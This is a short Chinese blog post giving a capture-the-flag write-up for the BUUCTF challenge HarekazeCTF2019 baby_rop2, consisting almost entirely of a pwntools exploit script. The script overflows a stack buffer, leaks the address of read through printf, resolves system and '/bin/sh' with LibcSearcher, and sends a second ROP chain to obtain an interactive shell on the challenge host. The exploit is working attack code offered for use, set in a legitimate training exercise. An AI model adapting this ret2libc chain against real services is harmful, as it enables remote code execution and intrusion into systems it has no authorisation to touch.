您的位置:首页 > 运维架构

buuctf [HarekazeCTF2019]baby_rop2

2020-05-07 04:25 1586 查看

一道常规的泄漏libc然后rop的题目

exp:

from pwn import *
from LibcSearcher import *

local_file  = './babyrop2'
local_libc  = './libc.so.6'
remote_libc = './libc.so.6'

select = 1

if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 26691)
#libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims, drop=True  :r.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
gdb.attach(r,cmd)

pop_rdi = 0x0000000000400733 # pop rdi ; ret
pop_rsi = 0x0000000000400731 # pop rsi pop r15 ; ret
s = 0x400790
read_got = elf.got['read']
print_plt = elf.plt['printf']
main = elf.sym['main']

p1 = flat(['a'*0x20, 'b'*0x8, pop_rdi, s, pop_rsi, read_got, 0, print_plt, main])
sla('name? ',p1)
#read_addr = uu64(ru('\x7f')[-6:])
read_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))

libc = LibcSearcher('read', read_addr)
libcbase = read_addr - libc.dump('read')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
p2 = flat(['a'*0x20, 'b'*8, pop_rdi, binsh_addr, system_addr, 0xdeadbeef])
sla('name? ',p2)

r.interactive()
Tower2358 原创文章 31获赞 1访问量 883 关注 私信
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: